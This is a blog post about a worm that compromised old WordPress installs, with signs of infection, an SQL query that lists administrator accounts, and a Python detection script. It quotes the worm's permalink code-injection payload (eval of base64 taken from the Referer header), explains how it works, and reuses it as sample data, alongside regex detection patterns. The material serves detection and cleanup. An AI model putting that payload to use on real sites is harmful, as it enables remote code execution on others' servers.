Yesterday, while I was checking my WP Dashboard, I came across Lorelle’s post warning WordPress users that old WordPress versions were being attacked, and that the number of sites being hit was increasing by the hour. When I looked for related news on the web, I found out that the popular web design blog Smashing Magazine and tech evangelist Robert Scoble’s blog, Scobleizer, had recently fallen victim to these attacks.
At first I thought it was the same kind of attack that hit my own blog 2-3 days ago. If you follow me on Twitter or Facebook, you might have come across my status updates about an attack on my blog using the wp-pass redirect vulnerability, a security flaw found in older versions of WordPress.
Later that day, Matt Mullenweg published a post on the WordPress Dev Blog entitled “How To Keep WordPress Secure”. There I learned that these recent attacks were different and were caused by a smart and malicious computer worm:
Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.
The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.
I’m sure a lot of WordPress blogs are still under attack even as we speak, but the ones at risk are self-hosted WordPress blogs running older versions of WordPress (anything prior to 2.8.4). WordPress.com blogs are not at risk because they are always kept up-to-date. In this case, hiding your WordPress version is not enough: the worm simply tries the bug rather than asking which version you run, so the only way to keep your blog safe from this type of attack is to always update to the latest version available.
How do you know if your blog was already attacked?
Lorelle shares two clues to check whether your blog has been attacked.
1. There are strange additions to the pretty permalinks (the permalink structure under Settings > Permalinks), such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords to look for are “eval” and “base64_decode.”
2. A “back door” was created by a “hidden” Administrator. Check your site’s users for “Administrator (2)” or a name you do not recognize. Remember that the worm uses JavaScript to hide its account from the Users page, so an empty-looking list is not proof that you are clean. If you can’t access that account, check out Journey Etc’s solution.
If you have confirmed that your blog has been attacked, the WordPress Dev team has set up a My Site Was Hacked page to help you out.
If you have access to your MySQL database and want to make sure that there are no extra administrator accounts registered on your blog, run the following SQL query against your WordPress database. It reads the role data directly, so the worm’s JavaScript trick cannot hide anything from it.
[sql]
-- Lists every account that holds the administrator role. WordPress stores roles
-- as a serialized PHP array in the {prefix}capabilities user meta, so a LIKE
-- match on "administrator" is enough.
-- If wp-config.php sets a custom $table_prefix, replace "wp_" in all three places.
SELECT u.ID, u.user_login, u.user_registered
FROM wp_users u, wp_usermeta um
WHERE u.ID = um.user_id
AND um.meta_key = 'wp_capabilities'
AND um.meta_value LIKE '%administrator%';
[/sql]
[via Dougal Campbell]
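The two clues above and the extra-administrator query, put together as one script. This is an added example of my own, not code from the original post, from Lorelle, or from WordPress: it builds an in-memory SQLite copy of the relevant wp_ tables filled with constructed sample rows (the permalink payload is the one quoted above), decodes the stored permalink structure before looking for eval/base64_decode, lists administrators straight from the database, and, as a heuristic of my own, flags posts that contain CSS-hidden markup, since the worm inserts hidden spam into old posts. The table prefix, user names, dates and post bodies are all made up; the same SQL works against MySQL once you point it at your real connection and prefix.

```python
"""
Added example (not from the original post, Lorelle, or WordPress): runs the
three checks described above against a WordPress database. It uses an
in-memory SQLite copy of the relevant tables with constructed sample rows so it
runs offline; the queries are plain enough to run unchanged against MySQL.
"""
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data. The permalink value is the indicator quoted in the post.
MALICIOUS_PERMALINK = (
    "/category/post-title/%&(%7B$%7Beval(base64_decode("
    "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/"
)

SCHEMA = """
CREATE TABLE wp_options  (option_name TEXT, option_value TEXT);
CREATE TABLE wp_users    (ID INTEGER, user_login TEXT, display_name TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_posts    (ID INTEGER, post_title TEXT, post_content TEXT);
"""


def sample_db():
    """Build an in-memory database that looks like a compromised blog (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.execute("INSERT INTO wp_options VALUES (?, ?)",
                ("permalink_structure", MALICIOUS_PERMALINK))
    con.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", [
        (1, "jaypee", "jaypee", "2007-01-01 00:00:00"),
        (2, "Administrator", "Administrator (2)", "2009-09-05 03:12:44"),  # the back door
    ])
    # WordPress stores roles as a serialized PHP array, hence LIKE '%administrator%' below.
    con.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", [
        (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ])
    con.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", [
        (10, "Clean post", "<p>Nothing to see here.</p>"),
        (11, "Old post", '<p>Hello</p><div style="display:none">'
                         '<a href="http://example.invalid/pills">cheap pills</a></div>'),
    ])
    return con


# Clue 1: the permalink structure is URL-encoded, so decode it before looking for
# the eval()/base64_decode() keywords the post names.
CODE_IN_PERMALINK = re.compile(r"\beval\s*\(|base64_decode", re.I)


def check_permalink(con, prefix="wp_"):
    """Return the decoded permalink structure if it carries injected PHP, else None."""
    row = con.execute(
        f"SELECT option_value FROM {prefix}options WHERE option_name = 'permalink_structure'"
    ).fetchone()
    if row is None:
        return None
    decoded = unquote(row[0])
    return decoded if CODE_IN_PERMALINK.search(decoded) else None


# Clue 2: list administrators straight from the database, because the worm hides
# its user from the dashboard's Users page with JavaScript.
def list_admins(con, prefix="wp_"):
    """Every user whose capabilities include the administrator role, oldest ID first."""
    # `prefix` is the $table_prefix from wp-config.php, not user input.
    sql = (
        f"SELECT u.ID, u.user_login, u.display_name, u.user_registered "
        f"FROM {prefix}users u JOIN {prefix}usermeta um ON u.ID = um.user_id "
        f"WHERE um.meta_key = ? AND um.meta_value LIKE '%administrator%' "
        f"ORDER BY u.ID"
    )
    return con.execute(sql, (prefix + "capabilities",)).fetchall()


def unexpected_admins(con, known_logins, prefix="wp_"):
    """Administrators whose login is not in the set of accounts you created yourself."""
    return [row for row in list_admins(con, prefix) if row[1] not in known_logins]


# Extra (my heuristic, not from the post): the worm injects hidden spam into old
# posts, so CSS-hidden markup or iframes are worth a manual review.
HIDDEN_MARKUP = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|<iframe", re.I)


def posts_with_hidden_html(con, prefix="wp_"):
    """(ID, title) of posts whose content contains hidden elements."""
    rows = con.execute(f"SELECT ID, post_title, post_content FROM {prefix}posts ORDER BY ID")
    return [(pid, title) for pid, title, body in rows if HIDDEN_MARKUP.search(body or "")]


if __name__ == "__main__":
    db = sample_db()
    print("permalink:", check_permalink(db))
    print("admins:", list_admins(db))
    print("unexpected admins:", unexpected_admins(db, {"jaypee"}))
    print("posts with hidden html:", posts_with_hidden_html(db))
```

Decoding the sample permalink yields `({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)`, which is what the worm relies on: once that string reaches PHP code evaluation, the `${...}` interpolation runs `eval()` on whatever base64 the attacker puts in the Referer header of a later request. The hidden-markup check will also flag legitimate themes and plugins that use `display:none`, so treat its output as a review list, not a verdict.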
Here at JaypeeOnline, I always encourage everyone to keep their WordPress install up-to-date. Whenever a new version of WordPress is released, I publish it here so more users are aware of it. I always say, “better safe than sorry” and “prevention is better than cure”. I like Matt’s analogy:
Upgrading is taking your vitamins; fixing a hack is open heart surgery.
It’s unfortunate that some users wait until their blogs get compromised, or for something like this to happen, before they upgrade WordPress. Save yourself the hassle, problems and headache and always keep your WordPress blogs up-to-date! It also helps to make regular backups of your WordPress database and your files, so that if you ever do have to recover from a hack you have a clean copy to go back to. If you have finished reading this post and still haven’t upgraded your WordPress install, what are you waiting for? UPGRADE IT NOW!!!
Anyone else had their blog victimized by these recent attacks? If so, what did you do to fix it? If not, what preventive measures did you take to keep your WordPress-powered blogs secure?